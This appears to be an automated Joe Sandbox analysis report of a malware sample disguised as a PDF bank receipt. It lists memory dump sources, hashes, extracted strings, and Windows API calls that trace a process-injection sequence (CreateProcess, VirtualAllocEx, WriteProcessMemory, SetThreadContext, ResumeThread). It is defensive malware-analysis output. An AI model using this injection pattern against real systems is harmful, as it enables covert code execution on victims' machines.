                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9da111f4a605b33d466880047fd86617ceac0fb273fb818c23399554512916f1
                                                                                                                                                          • Instruction ID: 63e4a885354facca970a88a902fb90f7eaa763b455ad27c659cac410325608ea
                                                                                                                                                          • Opcode Fuzzy Hash: 9da111f4a605b33d466880047fd86617ceac0fb273fb818c23399554512916f1
                                                                                                                                                          • Instruction Fuzzy Hash: C851F9B4E0520A9FCB08CFA5D5865EEFBB2FF89211F14942AD426E7364D7389A01CF54
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bb8d55e386d2297e717ad5f84aa4e0babf2a649ef914e2a29eea408a01ff9da7
                                                                                                                                                          • Instruction ID: 8b14712e5a9e8202279dee23d5676134e10934abab376c42fcc1709566ea92d4
                                                                                                                                                          • Opcode Fuzzy Hash: bb8d55e386d2297e717ad5f84aa4e0babf2a649ef914e2a29eea408a01ff9da7
                                                                                                                                                          • Instruction Fuzzy Hash: D9511B70E052199FCB44CFA9C9406AEFBF2FF89300F14E16AD919B7254D7349A42CBA5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d2f6b64e3131b19c8ea65cd7d8d0df92b2f312c4e61944d506ac3b65fc5e742a
                                                                                                                                                          • Instruction ID: 11008de6ab222a17cb07edb52d570fe7efa5bc861260c25fe7be05842f076be1
                                                                                                                                                          • Opcode Fuzzy Hash: d2f6b64e3131b19c8ea65cd7d8d0df92b2f312c4e61944d506ac3b65fc5e742a
                                                                                                                                                          • Instruction Fuzzy Hash: FE4103B4E04219DFDB08DFAAD8446AEFBF2EB88310F14D06AE419B7254DB3459818B65
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d3ec5b0392eafd547fe5f36f53efe45acbc10c6c2307c06a18f3ad5cc3cd8839
                                                                                                                                                          • Instruction ID: ebd05c23e1785f1502d72154777a5a0dddcf8e892c156dfb89153e6577050c18
                                                                                                                                                          • Opcode Fuzzy Hash: d3ec5b0392eafd547fe5f36f53efe45acbc10c6c2307c06a18f3ad5cc3cd8839
                                                                                                                                                          • Instruction Fuzzy Hash: 23516970D44359DFCB99CFB9C8954DABBB2FF89310F0481AEE8459A246E7358912CF81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: aa924f3c0144eec57ccfee1644819d2d8e3cc0a1c91ce2f9f3c90d79b65e3353
                                                                                                                                                          • Instruction ID: ce73d56121282382cb04a4565b35e46d8d34569a814e2e9098ec276098308584
                                                                                                                                                          • Opcode Fuzzy Hash: aa924f3c0144eec57ccfee1644819d2d8e3cc0a1c91ce2f9f3c90d79b65e3353
                                                                                                                                                          • Instruction Fuzzy Hash: 0F41E5B4E042199FDB08DFAAD8446AEFFF2EF88310F14D06AE419B7254DB3459818F55
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 02143d1bfa63e503b41b6d79e03088a09bf9a46749fc0f565114898003b7dc07
                                                                                                                                                          • Instruction ID: ee283c30c4ea921916f043adde8009950ab7ea064775f3fcbbf48e3b59016e41
                                                                                                                                                          • Opcode Fuzzy Hash: 02143d1bfa63e503b41b6d79e03088a09bf9a46749fc0f565114898003b7dc07
                                                                                                                                                          • Instruction Fuzzy Hash: A531EC71E016199FEB59CF6ADC4079EBBB3BFC9300F14C1AAD508A7265EB300A558F51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (oq$Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3931962165

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3106737575

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3106737575
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (oq$Hoq
                                                                                                                                                          • API String ID: 0-3084834809
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A0F1A0E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A0F1A0E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0165AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0165AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFromIconResource
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3668623891-0
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A0F15E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          APIs
                                                                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 08157C0F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrawText
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2175133113-0
                                                                                                                                                          APIs
                                                                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 08157C0F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrawText
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2175133113-0
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A0F15E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A0F16C0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A0F0FFE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A0F16C0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A0F0FFE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,081596FA,?,?,?,?,?), ref: 0815979F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFromIconResource
                                                                                                                                                          • String ID:
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A0F14FE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A0F14FE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A0F5855
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A0F5855
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: OijW
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: u|P
                                                                                                                                                          • API String ID: 0-1764873574
                                                                                                                                                          • Opcode ID: d1557b934f8ba7e8706f3879b1ef95e489a5ee641824a0a68e042b5fa4c00cc8
                                                                                                                                                          • Instruction ID: 730e96a993b9d4d432bf9beb9c9ac645ead733d48f0550541500ced355afcfee
                                                                                                                                                          • Opcode Fuzzy Hash: d1557b934f8ba7e8706f3879b1ef95e489a5ee641824a0a68e042b5fa4c00cc8
                                                                                                                                                          • Instruction Fuzzy Hash: 3F112CB8E0520ADFCB04CFA9D54119EBBF2AB84310F2080AA9905E7324E7349F41CB55
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: u|P
                                                                                                                                                          • API String ID: 0-1764873574
                                                                                                                                                          • Opcode ID: fe0477a3e85cdcf66b64b386170afd42bb7868ee22de4c37bb9fc55a25d5cd08
                                                                                                                                                          • Instruction ID: a394fab65d20a3eb61e6483cb4d66ae2ede8da1865493fa51875c0f17625d2c6
                                                                                                                                                          • Opcode Fuzzy Hash: fe0477a3e85cdcf66b64b386170afd42bb7868ee22de4c37bb9fc55a25d5cd08
                                                                                                                                                          • Instruction Fuzzy Hash: 1011FBB8E0521EDFCB44CFA9C5415AEBBF2EB88310F2090AA9519E7354E7349F41CB55
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: G'/.
                                                                                                                                                          • API String ID: 0-3562003039
                                                                                                                                                          • Opcode ID: ae49c609d53ebae3c89096d9d265b05f99e62a02ed57627b729c770ca9c85006
                                                                                                                                                          • Instruction ID: 73a7333bf9488a4119ffe3497847464d390117e403a90dd645714829e6616d4d
                                                                                                                                                          • Opcode Fuzzy Hash: ae49c609d53ebae3c89096d9d265b05f99e62a02ed57627b729c770ca9c85006
                                                                                                                                                          • Instruction Fuzzy Hash: D9018C70E19609DFCB08CFA4D94659DBFF2EB8A210F24D4B6C405E7264E7349B40DB51
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: G'/.
                                                                                                                                                          • API String ID: 0-3562003039
                                                                                                                                                          • Opcode ID: 7d376f80b8376de85c21d19b2f7ced8ff4a7f8f5b9f06ebe2dfc7ea543a86042
                                                                                                                                                          • Instruction ID: 9a7411d86f0cdaa9c5f0fb7a2e3e4f51b0608e7065af3f2a48f9781f976c60b3
                                                                                                                                                          • Opcode Fuzzy Hash: 7d376f80b8376de85c21d19b2f7ced8ff4a7f8f5b9f06ebe2dfc7ea543a86042
                                                                                                                                                          • Instruction Fuzzy Hash: A20178B0E0520DDBCB08DFA5DA4599DFAB6EB99300F24E4A5951AE3264E7309B00DB11
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 264a0defdfd0c5ddfe42f5ad3a12de45ef44418a04ec0568428fcf7fffa17b53
                                                                                                                                                          • Instruction ID: 6d1df962b3a38c867d3ce50e4c2f5be3a8991db829d290cd3e2a36b31aa16e25
                                                                                                                                                          • Opcode Fuzzy Hash: 264a0defdfd0c5ddfe42f5ad3a12de45ef44418a04ec0568428fcf7fffa17b53
                                                                                                                                                          • Instruction Fuzzy Hash: F0919574E0020A8FDB44DFA8D5809DDBBB6FF88310F209269D515AB369DB31AD46CF90
                                                                                                                                                          Memory Dump Source
